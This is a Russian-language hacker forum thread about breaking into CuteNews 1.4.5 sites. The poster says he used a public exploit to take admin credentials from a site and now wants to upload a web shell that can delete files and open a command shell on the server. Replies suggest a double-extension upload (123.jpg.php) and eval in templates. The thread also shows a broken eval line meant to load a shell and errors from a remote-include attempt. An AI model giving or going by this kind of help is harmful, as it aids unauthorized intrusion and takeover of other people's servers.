![]() |
CuteNews 1.4.5 help
Здраствуйте товарисчи !
С толкнулся с такой проблемой. Пробежавшись по сайтам нашел сплойт на 1,4,5 выдернул акк и пароль на админку, проверил - входит. Опять полез по просторам искать возможность залить шел на сервак- в итоге попал сюда =) ибо не че путного не нашел. Хотел спросить знающих, какие способы есть заливки шела имея админа в 1,4,5 ? (Желательно если такое возможно с пояснениями) И сразу же не отходя ещё вопрос по шелу- есть шел с функциями удаления файлов на удаленной машине, открытие cmd? З.Ы. Убедительная просьба не отправлять на поиск т.к. там все не то что надо, либо для cutenews расписано в 2 строчки что приводик к замешательству... |
Там можно залить картинку в виде 123.jpg.php а также евалить код в шаблонах. как сделать второе - догадайся сам.
|
Про 1:
а можно поподробней про 123.jpg.php . (попробовал залить через админку пишет такой тип файлов не поддерживается) 2: Я пробывал вставлять на прямую пхп код, но он не выводит его... тоесть вообще не воспринимает. а по поводу евалить ? - оно ? <?php eval(GET['путь до шела/shell.php']) ?> - тоесть с помощью этой строчки загрузиться мой шелл ? |
нашел на секьюритилаб
Цитата:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\appserv\htdocs\inc.php on line 1 Warning: include(http://ip(там где картинка)/cute/data/upimages/image.gif) [function.include]: failed to open stream: no suitable wrapper could be found in C:\appserv\htdocs\inc.php on line 1 Warning: include() [function.include]: Failed opening 'http://ip(там где картинка)/cute/data/upimages/image.gif' for inclusion (include_path='.;C:\appserv\php\pear\') in C:\appserv\htdocs\inc.php on line 1 З.Ы. в пхп.ини include = on fopen = on |
Цитата:
|
пробуй eval'ить код
PHP код:
|
Цитата:
Есть какие нить варианты, как залить шелл имея админку в cutenews ? |
Цитата:
|
с картинками там проблема,вот взял и передал сплоит что на милворме,вот что получилось
Код:
$allowed_extensions = array("gif", "jpg", "png", "bmp", "jpe", "jpeg"); |
а если у меня в разделе статистика, в аттопроверке системы все поставлено на NO, точ то с этим можно сделать...?
а при попытке залить картинку, пишет Цитата:
|
| Время: 00:28 |